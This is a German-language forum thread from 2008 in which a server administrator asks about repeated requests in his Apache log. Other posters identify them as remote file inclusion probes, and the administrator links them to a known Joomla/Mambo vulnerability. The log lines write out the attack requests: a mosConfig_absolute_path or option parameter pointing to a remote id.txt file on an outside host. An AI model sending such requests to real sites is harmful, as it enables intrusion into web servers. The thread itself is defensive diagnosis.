Zugriff von Apache 127.0.0.1 auf externe URL

Alles rund um sicherheitsrelevante Fragen und Probleme.
Antworten
worel
Beiträge: 59
Registriert: 18.02.2005 12:38:11

Zugriff von Apache 127.0.0.1 auf externe URL

Beitrag von worel » 13.01.2008 14:24:14

Hi!

Habe im Webserver Log immer und immer wieder folgende Zugriffe:

Code: Alles auswählen

127.0.0.1 - - [12/Jan/2008:11:50:11 +0100] "GET /?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt%3f HTTP/1.1" 302 432 "-" "libwww-perl/5.805"
127.0.0.1 - - [12/Jan/2008:11:50:11 +0100] "GET /apache2-default/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt%3f HTTP/1.1" 200 44 "-" "libwww-perl/5.805"
127.0.0.1 - - [12/Jan/2008:19:29:21 +0100] "GET /?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt%3f HTTP/1.1" 302 432 "-" "libwww-perl/5.805"
127.0.0.1 - - [12/Jan/2008:19:29:21 +0100] "GET /apache2-default/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt%3f HTTP/1.1" 200 44 "-" "libwww-perl/5.805"
127.0.0.1 - - [12/Jan/2008:19:49:29 +0100] "GET /?option=http://www.gumgangfarm.com/shop/data/id.txt%3f HTTP/1.1" 302 415 "-" "libwww-perl/5.805"
127.0.0.1 - - [12/Jan/2008:19:49:29 +0100] "GET /apache2-default/?option=http://www.gumgangfarm.com/shop/data/id.txt%3f HTTP/1.1" 200 44 "-" "libwww-perl/5.805"
Was zum Hänker kann das sein? Mir scheint es, als ob etwas von einer externen Ressource geladen werden soll!
System ist am aktuellsten Stand.

Bzw. wie findet man heraus welche Aktion diesen Zugriff auslöst?

lg
Nach oben
Benutzeravatar
Onkel Hotte
Beiträge: 44
Registriert: 22.11.2005 10:00:27
Wohnort: Potsdam

Beitrag von Onkel Hotte » 13.01.2008 14:29:44

Was liegt denn im Apache Default Verzeichnis?
Es sieht so aus, als wenn eine Art "Shell" geladen werden sollte.
Erst wenn der letzte Programmierer eingesperrt und jede Idee patentiert ist, werdet ihr merken, dass Anwälte nicht programmieren können.
Nach oben
worel
Beiträge: 59
Registriert: 18.02.2005 12:38:11

Beitrag von worel » 13.01.2008 17:34:11

Hallo!

Also im Verzeichnis apache2-default finde ich nur einige png Dateien. Diese habe ich jetzt gelöscht bzw. woanders hinverfrachtet. Werde außerdem das Verzeichnis umbenennen.

"mosConfig_absolute_path" habe ich nirgends gefunden...

Mal sehen wie es weiter geht!

Andere Frage:
Wie schaffen es eigentlich ganz große Hoster, Mißbrauch der Server weitgehend zu unterbinden? Jede Homepage kann man ja nicht begutachten. Applikations Gateways etc.??
Nach oben
worel
Beiträge: 59
Registriert: 18.02.2005 12:38:11

Beitrag von worel » 13.01.2008 17:42:38

So, bin einen Schritt weiter. Anscheinend ist die "mosConfig_absolute_path" Geschichte eine Lücke in Joomla bzw. Mambo.
Nachdem es doch zig Kunden auf dem Server gibt, wäre es natürlich interessant, über welchen web Kunden das passiert.
Hat dazu irgendjemand eine Idee? Kann nicht jede cms version manuell prüfen...
Nach oben
Antworten

Zurück zu „Sicherheit“